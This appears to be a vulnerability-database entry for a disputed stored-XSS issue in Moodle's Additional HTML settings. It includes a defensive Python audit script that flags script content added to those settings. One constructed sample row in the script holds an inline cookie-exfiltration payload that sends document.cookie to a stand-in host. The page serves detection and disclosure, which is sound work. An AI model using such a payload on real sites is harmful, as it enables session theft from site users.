VYPR
Moderate severity. NVD Advisory. Published May 16, 2023. Updated Aug 3, 2024.

CVE-2021-27131

Description

Moodle 3.10.1 is vulnerable to persistent/stored cross-site scripting (XSS) due to improper input sanitization of the "Additional HTML Section" via the "Header and Footer" parameter in /admin/settings.php. This allows an attacker to steal admin and all user account cookies by storing a malicious XSS payload in Header and Footer. NOTE: this is disputed by the vendor because the "Additional HTML Section" for "Header and Footer" can only be supplied by an administrator, who is intentionally allowed to enter unsanitized input (e.g., site-specific JavaScript).

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: moodle/moodle (Packagist)
Affected versions: <= 3.10.1
Patched versions: none listed


Patches

None published; the vendor disputes the finding.

Vulnerability mechanics

Root cause

"Improper input sanitization on the "Header" and "Footer" fields in the Additional HTML Section allows stored XSS."

Attack vector

An attacker who already possesses administrator credentials navigates to Site Administration > Appearance > Additional HTML and injects a JavaScript payload into the Header or Footer field. Because the field is rendered into every page, the payload executes in the browser of every visitor, including other administrators, which is how the cookie theft described above is achieved.

Affected code

The vulnerability exists in the "Additional HTML Section" of `/admin/settings.php`, specifically the "Header" and "Footer" parameters [ref_id=1]. The code path does not sanitize or neutralize this administrator-controlled input before it is rendered on every page of the application. The security-relevant point is the trust boundary: the input is writable only by administrators, and the vendor treats raw HTML and JavaScript here as an intended feature rather than a sanitization gap.

What the fix does

No patch is provided in the bundle. The vendor disputes the finding, arguing that the "Additional HTML Section" is intentionally designed to allow administrators to enter unsanitized input such as site-specific JavaScript [ref_id=1]. No remediation guidance is published by the vendor.
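Because the vendor treats these fields as intentionally raw, there is no code fix to apply; the practical control is to treat any change to the Additional HTML settings as a high-signal administrative event and to alert when executable content is introduced. The following audit script is an added example, not Moodle's own code or tooling. It assumes the three settings are stored under the config names `additionalhtmlhead`, `additionalhtmltopofbody` and `additionalhtmlfooter`, that changes arrive as rows shaped like Moodle's `config_log` table (`name`, `oldvalue`, `value`, `userid`, `timemodified`), and that `cdn.example.edu` is a site-approved script host; all three are assumptions, and the log rows below are constructed.

```python
"""Audit changes to Moodle's 'Additional HTML' settings for executable content.

Added example, not Moodle code. Assumptions: the config names below, the
config_log-like row shape, and the approved script host. Sample rows are
constructed for illustration.
"""
import re
from urllib.parse import urlparse

# Settings whose value is injected verbatim into every rendered page (assumption).
WATCHED_SETTINGS = {"additionalhtmlhead", "additionalhtmltopofbody", "additionalhtmlfooter"}

# Hosts from which an external <script src> is expected (assumption, site-specific).
ALLOWED_SCRIPT_HOSTS = {"cdn.example.edu"}

SCRIPT_TAG_RE = re.compile(r"<\s*script\b([^>]*)>", re.IGNORECASE)
SRC_ATTR_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
# Coarse heuristics: an on*= attribute inside a tag, or a javascript: URI anywhere.
EVENT_HANDLER_RE = re.compile(r"<[^>]*\bon[a-z]+\s*=", re.IGNORECASE)
JS_URI_RE = re.compile(r"\bjavascript\s*:", re.IGNORECASE)


def script_indicators(html):
    """Return sorted labels describing executable content found in html."""
    labels = set()
    for m in SCRIPT_TAG_RE.finditer(html):
        src = SRC_ATTR_RE.search(m.group(1))
        if src is None:
            labels.add("inline-script")
        else:
            host = urlparse(src.group(1)).hostname or ""
            if host in ALLOWED_SCRIPT_HOSTS:
                labels.add("external-script-allowed:" + host)
            else:
                labels.add("external-script-unexpected:" + (host or src.group(1)))
    if EVENT_HANDLER_RE.search(html):
        labels.add("inline-event-handler")
    if JS_URI_RE.search(html):
        labels.add("javascript-uri")
    return sorted(labels)


def audit_config_log(rows):
    """Flag config_log rows that introduce executable content into a watched setting.

    Only indicators absent from the previous value are reported, so a reviewed,
    long-standing script does not alert on every unrelated edit to the field.
    """
    findings = []
    for row in rows:
        if row["name"] not in WATCHED_SETTINGS:
            continue
        before = set(script_indicators(row.get("oldvalue") or ""))
        after = set(script_indicators(row.get("value") or ""))
        new = sorted(after - before)
        if not new:
            continue
        # Anything other than a script from an approved host is worth a human look.
        only_allowed = all(i.startswith("external-script-allowed:") for i in new)
        findings.append({
            "setting": row["name"],
            "userid": row["userid"],
            "timemodified": row["timemodified"],
            "indicators": new,
            "severity": "info" if only_allowed else "high",
        })
    return findings


# Constructed sample rows in the assumed config_log shape.
SAMPLE_CONFIG_LOG = [
    # Benign: plain markup added to the footer.
    {"name": "additionalhtmlfooter", "userid": 2, "timemodified": 1621123456,
     "oldvalue": "", "value": "<p>Questions? Contact the help desk.</p>"},
    # Expected: analytics script loaded from the approved host.
    {"name": "additionalhtmlhead", "userid": 2, "timemodified": 1621123500,
     "oldvalue": "", "value": '<script src="https://cdn.example.edu/analytics.js"></script>'},
    # Suspicious: a second admin account appends an inline cookie-exfiltration script.
    {"name": "additionalhtmlhead", "userid": 7, "timemodified": 1621200000,
     "oldvalue": '<script src="https://cdn.example.edu/analytics.js"></script>',
     "value": '<script src="https://cdn.example.edu/analytics.js"></script>'
              '<script>new Image().src="https://collector.invalid/?c="+encodeURIComponent(document.cookie)</script>'},
    # Unrelated setting: ignored.
    {"name": "sitename", "userid": 2, "timemodified": 1621200100, "oldvalue": "A", "value": "B"},
]

if __name__ == "__main__":
    for finding in audit_config_log(SAMPLE_CONFIG_LOG):
        print(finding)
```

In a real deployment the rows would come from a query against the `config_log` table (or from the admin settings change event in Moodle's log store), and the findings would feed the SIEM alongside the login events for the administrator account that made the change; the diff-based reporting is what keeps the alert volume low on a site that legitimately carries an approved analytics snippet.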

Preconditions

  • auth: Attacker must have administrator-level credentials for the Moodle instance
  • config: Moodle 3.10.1 (the advisory lists <= 3.10.1 as affected)

Reproduction

1. Log in to the Moodle instance with administrator credentials.
2. Navigate to Site Administration > Appearance > Additional HTML.
3. Insert a JavaScript payload into the Header or Footer field and save; the payload is then rendered on every page of the site.

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
